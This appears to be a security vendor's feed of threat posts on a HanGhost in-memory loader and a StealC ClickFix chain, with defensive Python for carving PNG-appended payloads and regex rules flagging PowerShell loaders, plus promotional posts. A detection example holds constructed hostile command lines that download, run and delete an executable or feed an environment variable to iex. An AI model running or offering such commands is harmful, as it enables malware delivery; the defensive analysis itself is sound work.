🚨 Update Your Detection Rules: New In-Memory Loader

We caught a highly evasive #HanGhost loader, designed to bypass traditional detection through layered obfuscation and in-memory execution. This activity targets corporate users handling payments, logistics, and contract workflows, expanding exposure across critical operations.

⚠️ The delivery chain combines obfuscated JavaScript, hidden PowerShell execution, and environment-variable staging.

In the second stage, the loader retrieves an image file and extracts an encrypted payload embedded at the end of the file, combining steganography with in-memory loading and making detection significantly harder ❗️
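The "payload at the end of the file" trick works because PNG decoders stop reading at the IEND chunk, so anything appended after it never affects rendering. The following Python is an added example written for this post, not ANY.RUN's tooling or the loader's own code: it builds a constructed 1x1 PNG with a stand-in blob glued on after IEND (a byte pattern, not a real HanGhost stage), walks the chunk list with CRC checks, carves whatever follows IEND, and flags it when it is long and high-entropy. The length and entropy thresholds are assumptions chosen for triage, not values taken from the campaign.

```python
import math
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: big-endian length, type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(trailer: bytes = b"") -> bytes:
    """Constructed sample: a valid 1x1 RGB PNG with `trailer` appended after IEND.

    Image viewers render this normally because decoders stop at IEND, which is
    exactly why an appended payload survives casual inspection.
    """
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, colour type 2 (RGB)
    scanline = b"\x00" + b"\xff\x00\x00"                  # filter byte 0 + one red pixel
    return (PNG_SIGNATURE
            + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b"")
            + trailer)


def carve_after_iend(blob: bytes) -> bytes:
    """Walk the chunk list, verifying each CRC, and return every byte after IEND."""
    if not blob.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + data + 4 CRC
        if end > len(blob):
            raise ValueError(f"truncated {ctype!r} chunk")
        expected = zlib.crc32(blob[pos + 4:pos + 8 + length]) & 0xFFFFFFFF
        actual = struct.unpack(">I", blob[end - 4:end])[0]
        if expected != actual:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        pos = end
        if ctype == b"IEND":
            return blob[pos:]
    raise ValueError("no IEND chunk found")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or compressed data sits close to 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def has_suspicious_trailer(blob: bytes, min_len: int = 64, min_entropy: float = 7.0) -> bool:
    """Triage verdict (thresholds are assumptions): sizeable high-entropy data after IEND."""
    trailer = carve_after_iend(blob)
    return len(trailer) >= min_len and shannon_entropy(trailer) >= min_entropy


if __name__ == "__main__":
    # Stand-in for the encrypted second stage: constructed bytes, not a real HanGhost blob.
    fake_payload = bytes(range(256)) * 4
    carved = carve_after_iend(build_sample_png(fake_payload))
    print(len(carved), "trailing bytes, entropy %.2f" % shannon_entropy(carved))
```

Run it against any PNG pulled from a sandbox session's network capture; a clean image returns an empty trailer, while a carrier image returns the appended blob ready for the decryption step the loader performs in memory. The CRC check matters: an attacker can also hide data inside a bogus ancillary chunk before IEND, and a chunk walker that trusts lengths without verifying CRCs is easy to desynchronise.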

👾 The loader is used to deliver multiple malware families: #PureHVNC, #XWorm, #Meduza, #AgentTesla, and #Phantom, with some chains also deploying #UltraVNC, extending the impact from initial access to persistent remote control.

⚡️#ANYRUN Sandbox allows analysts to reconstruct the full execution chain, helping confirm complex multi-stage activity earlier and reduce MTTR.

🔗 JavaScript-to-Payload execution chain:

JS ➡️ PowerShell ➡️ in-memory .NET assembly ➡️ PNG payload ➡️ Malware

📈 The campaign shows wave-based activity, indicating ongoing development and scaling:

March 26 — early cluster

April 1–2 — first large multi-family wave

April 3 — focused wave (PureHVNC / AgentTesla / Phantom)

April 6 — PureHVNC-heavy activity

April 7 — new peak with split between PureHVNC and XWorm/Meduza clusters

April 8 — multi-family wave (PureHVNC / Phantom / AgentTesla)

April 9–13 — more focused wave dominated by PureHVNC, with Phantom, DarkCloud, Formbook, and Meduza also present

👨‍💻 See the analysis session and collect #IOCs to speed up detection and response: https://app.any.run/tasks/cc26155e-e8e9-442b-b000-8d1a1435e7db?utm_source=mastodon&utm_medium=post&utm_campaign=hanghost&utm_content=linktoservice&utm_term=130426

🔍 Use this TI Lookup query to pivot from IOCs, review related activity, and validate your detection coverage (decoded, the query is commandLine:"bYPaSS -Command *iex $env:" over a 180-day range): https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=hanghost&utm_content=linktotilookup&utm_term=130426#%7B%2522query%2522:%2522commandLine:%255C%2522bYPaSS%2520-Command%2520*iex%2520$env:%255C%2522%2522,%2522dateRange%2522:180%7D%20

👨‍💻 Equip your SOC with faster decisions and lower workload. See how #ANYRUN fits your workflows: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=hanghost&utm_content=linktoenterprise&utm_term=130426

#cybersecurity #infosec

❗️ MSSP growth brings higher alert volume and stricter SLAs.

Unifying detection, enrichment, and reporting with #ANYRUN helps teams support more clients while keeping service quality consistent ⚡️

Explore how #ANYRUN strengthens MSSP growth at scale: https://any.run/mssp/?utm_source=mastodon&utm_medium=post&utm_campaign=mssp_growth&utm_term=080426&utm_content=linktomssplanding

⏳ Every minute without execution context increases dwell time and business risk.

Integrate #ANYRUN into your current stack to reduce MTTR by 21 min per case and cut Tier 1 workload by up to 20%.

⚡️ Close the gap between detection and decision-making: https://any.run/integrations/?utm_source=mastodon&utm_medium=post&utm_campaign=all_integrations_connectors&utm_term=070426&utm_content=linktointegrations

⚠️ Encrypted HTTPS traffic remains one of the main reasons #phishing is harder to confirm quickly. Automatic SSL decryption significantly expands visibility in every #ANYRUN Sandbox session. See real-world examples:
🔹 #EvilTokens. Decrypted traffic exposed hidden HTTPS API calls behind the OAuth Device Code phishing flow, revealing session control and attacker infrastructure: https://app.any.run/tasks/2e8014a8-a90a-41bf-90fa-aa65da40fd20/?utm_source=mastodon&utm_medium=post&utm_campaign=ssl_decryption_examples&utm_term=020426&utm_content=linktoservice

🔹#FlowerStorm. SSL decryption enabled early detection of this phishkit via POST requests to /google.php at initial page load, before any user interaction or data entry: https://app.any.run/tasks/25694db7-2771-480c-9ff0-773e399331d6/?utm_source=mastodon&utm_medium=post&utm_campaign=ssl_decryption_examples&utm_term=020426&utm_content=linktoservice

🔹 Phishing via Telegram API. Decrypted traffic revealed data exfiltration through the Telegram Bot API, helping identify localized campaigns via encrypted traffic patterns: https://app.any.run/tasks/49484bb5-28ec-44ca-835a-9b3235bd6419/?utm_source=mastodon&utm_medium=post&utm_campaign=ssl_decryption_examples&utm_term=020426&utm_content=linktoservice

⚡️ Reduce phishing risk across your organization. Integrate #ANYRUN into your SOC’s triage & response workflows: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=ssl_decryption_examples&utm_term=020426&utm_content=linktoenterpriselanding

#cybersecurity #infosec

🚑 Limited context during analysis slowed triage and response at Health Shared Services, a healthcare organization supporting 130K+ endpoints

⚡️ See how #ANYRUN changed their SOC workflow and allowed analysts to handle real threats with lower MTTR/MTTD: https://any.run/cybersecurity-blog/healthcare-success-story/?utm_source=mastodon&utm_medium=post&utm_campaign=healthcare_success_story&utm_term=020426&utm_content=linktoblog

⚠️ #StealC is now delivered via a Cloudflare ClickFix flow, masking malicious activity behind trusted services. Behavioral analysis exposed a PowerShell-based execution chain used to download and run the payload while attempting to evade detection.

👾 The Process Tree reveals the payload chain: powershell.exe ➡️ powershell.exe ➡️ y3gag2iu.3wq.exe (StealC 🚨)

Multi-stage PowerShell execution and hidden payload delivery make early confirmation harder, slowing triage. #ANYRUN Sandbox helps analysts quickly validate the attack and reduce investigation time.

👨‍💻 See the analysis session and collect #IOCs to speed up detection and response: https://app.any.run/tasks/48e6b68d-dfa2-423e-8e7c-24cf8a6ef85b/?utm_source=mastodon&utm_medium=post&utm_campaign=cloudflare_clickfix&utm_term=010426&utm_content=linktoservice

⚡️ Learn how #ANYRUN helps SOCs detect complex threats and contain incidents faster: https://any.run/features/?utm_source=mastodon&utm_medium=post&utm_campaign=cloudflare_clickfix&utm_term=010426&utm_content=linktosandboxlanding

⚙️ Technical details:
The ClickFix page on diddyparty[.]click gets the victim to open PowerShell via Win+X ➡️ I (the terminal entry on the Windows power-user menu) and run a pasted command. That command, launched with -NoProfile -WindowStyle Hidden, forces TLS 1.2 for the download, stages a randomly named EXE in %TEMP%, pulls the payload via Invoke-WebRequest, executes it, and then attempts to delete the dropper. Full execution details are available in the Script Tracer tab.
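Both chains on this page leave a recognisable PowerShell command line behind: the HanGhost loader pairs an execution-policy bypass with a script body staged in an environment variable and piped to iex (the pattern the TI Lookup query above pivots on), while the StealC ClickFix command runs hidden, fetches to %TEMP%, executes and cleans up. The following Python is an added example for this post, not ANY.RUN's detection content: it applies a small set of AND-combined regex rules to process-creation command lines (as you would get from Sysmon Event ID 1 or Windows 4688). The sample command lines are constructed, including the example.invalid URL; the rule names and patterns are my assumptions, not names from either campaign.

```python
import re

# Each rule is a list of patterns that must ALL match the command line.
# Matching is case-insensitive because operators deliberately case-mangle
# tokens (the pivot query on this page keys on "bYPaSS").
RULES = {
    # HanGhost-style staging: policy bypass plus a script body pulled from $env:
    "execution_policy_bypass": [r"(?:-ex\w*|-ep)\s+bypass\b"],
    "env_var_staged_iex": [
        r"\b(?:iex|invoke-expression)\b\s*\(?\s*\$env:\w+"
        r"|\$env:\w+\s*\|\s*(?:iex|invoke-expression)\b",
    ],
    # ClickFix-style delivery: hidden window, fetch to %TEMP%, run it, delete it
    "hidden_window_no_profile": [r"-nop(?:rofile)?\b", r"-w(?:indowstyle)?\s+hidden\b"],
    "download_to_temp_and_run": [
        r"\b(?:invoke-webrequest|iwr|downloadfile|downloadstring)\b",
        r"(?:\$env:temp\b|gettemppath\(\))",
        r"\b(?:start-process|invoke-item)\b",
        r"\b(?:remove-item|del|rm)\b",
    ],
}

# Constructed sample command lines (not captured from the real sessions).
SAMPLE_CMDLINES = [
    # HanGhost-style: policy bypass, script body staged in an env var, fed to iex
    'powershell.exe -ep bYPaSS -Command "iex $env:JSDATA"',
    # ClickFix-style: hidden window, TLS 1.2 forced, random EXE in %TEMP%, fetched, run, deleted
    "powershell.exe -NoProfile -WindowStyle Hidden -Command "
    "\"[Net.ServicePointManager]::SecurityProtocol='Tls12'; "
    "$p=Join-Path $env:TEMP ([IO.Path]::GetRandomFileName()+'.exe'); "
    "Invoke-WebRequest -Uri 'https://example.invalid/payload' -OutFile $p; "
    "Start-Process $p; Remove-Item $p\"",
    # Benign admin one-liner that shares tokens with both chains but trips no rule
    'powershell.exe -NoProfile -Command "Get-ChildItem $env:TEMP"',
]


def match_rules(cmdline: str) -> list[str]:
    """Return the sorted names of every rule whose patterns all match `cmdline`."""
    return sorted(
        name for name, patterns in RULES.items()
        if all(re.search(p, cmdline, re.IGNORECASE) for p in patterns)
    )


def triage(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each command line to its matched rules; an empty list means no hit."""
    return {c: match_rules(c) for c in cmdlines}


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_CMDLINES).items():
        print(f"{hits or ['-']}  {cmd[:70]}")
```

Treat a hit on "env_var_staged_iex" or "download_to_temp_and_run" as a triage trigger rather than a verdict: the patterns are narrow enough to stay quiet on ordinary administration (the third sample shares -NoProfile and $env:TEMP with the malicious lines and matches nothing), but the authoritative confirmation is the reconstructed chain in the sandbox session, which is also where you pick up the decoded script body that the environment variable hides from the command line itself.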

🔍 IOCs:
diddyparty[.]click
3f0fe92c0e1c4663dcb851ce0fc97ddaed25b559be1d6e2cc0f66304ac652e38

#cybersecurity #infosec

🔥 Big March updates at #ANYRUN!

What's new:
🔹 Stronger phishing detection with automatic SSL decryption
🔹 Fewer blind spots with macOS & Windows Server VMs
🔹 Expanded threat coverage with new detections, rules, and TI reports

Learn more👇
https://any.run/cybersecurity-blog/release-notes-march-2026/?utm_source=mastodon&utm_medium=post&utm_campaign=release_notes_march_2026&utm_term=310326&utm_content=linktoblog

Release Notes: SSL Decryption, macOS, Windows Server & 1300+ New Detections

March updates in ANY.RUN bring stronger phishing detection, broader sandbox coverage with macOS and Windows Server, new detections, and fresh TI reports.

ANY.RUN's Cybersecurity Blog

Hope you found #RSAC2026 valuable. We definitely did 🚀

🏆 Honored to receive two Global InfoSec Awards, highlighting the impact #ANYRUN brings to enterprise SOCs & MSSPs.

Great to connect with partners and customers 🙌
Explore our RSAC takeaways: https://any.run/cybersecurity-blog/rsac-2026-highlights/?utm_source=mastodon&utm_medium=post&utm_campaign=rsac_2026&utm_term=300326&utm_content=linktoblog

A GUI at the cost of privacy: analysis of the malicious Zapret 2 GUI fork

The throttling of YouTube, Discord and other popular services in Russia has triggered a real boom in DPI-circumvention tools. The flagship zapret project by @bol-van is a powerful solution, but its console interface scares off the average user. On that ground, dozens of GUI wrappers "for housewives" have sprung up. But behind a pretty interface and the promise of "one-click bypass" there can be something more than just a proxy client. In this article I analyze the "Zapret 2 GUI" fork (author censorliber), which has collected hundreds of stars on GitHub but, on detailed analysis, turned out to be a full-fledged tool for espionage and system compromise.

https://habr.com/ru/articles/1015380/?utm_source=habrahabr&utm_medium=rss&utm_campaign=1015380

#zapret #blocking_bypass #dpi #malware #trojan #mitm #code_audit #ANYRUN #reverse_engineering

A GUI at the cost of privacy: analysis of the malicious Zapret 2 GUI fork

GitHub main page. The throttling of YouTube, Discord and other popular services in Russia has triggered a real boom in DPI-circumvention tools. The flagship zapret project by @bol-van is a powerful solution,...

Habr
